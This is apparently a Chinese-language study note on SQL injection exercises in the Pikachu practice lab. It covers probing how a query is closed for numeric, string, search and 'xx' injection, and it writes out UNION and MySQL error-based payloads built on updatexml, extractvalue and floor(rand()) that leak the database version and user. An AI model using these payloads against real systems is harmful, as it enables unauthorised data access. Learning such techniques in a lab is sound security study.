sql注入 pikachu

閉合條件的探測

數字型注入

  1. burp抓包
  2. 分別測試 id=1 and 1=1和id=1 or 1=1
  3. 存在漏洞

字符型注入

  1. ’ 報錯
  2. 探測閉合條件 ’ order by 1# 未報錯.構成閉合
  3. 同上有兩處查詢信息
    在這裏插入圖片描述

搜索型

在這裏插入圖片描述
在這裏插入圖片描述

xx型

  1. 先構造’ xx#
    在這裏插入圖片描述
  2. 根據報錯很容易寫出閉合
    在這裏插入圖片描述
  3. payload ')union select user(),user()#
    在這裏插入圖片描述

漏洞利用

  1. UNION 聯合查詢

  2. 基於報錯的注入
    MySQL顯錯式注入

    updatexml函數

select * from message where id =1 and updatexml(1, concat(0x7c,(select @@version)),1);

在這裏插入圖片描述
evtractvalue()函數

select * from message where id =1 and extractvalue(1, concat(0x7c,(select user())));

在這裏插入圖片描述
floor函數

select * from message where id = 1 union select * from (select count(*) , concat(floor(rand(0)*2),(select user())) a from information_schema.tables group by a)b

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章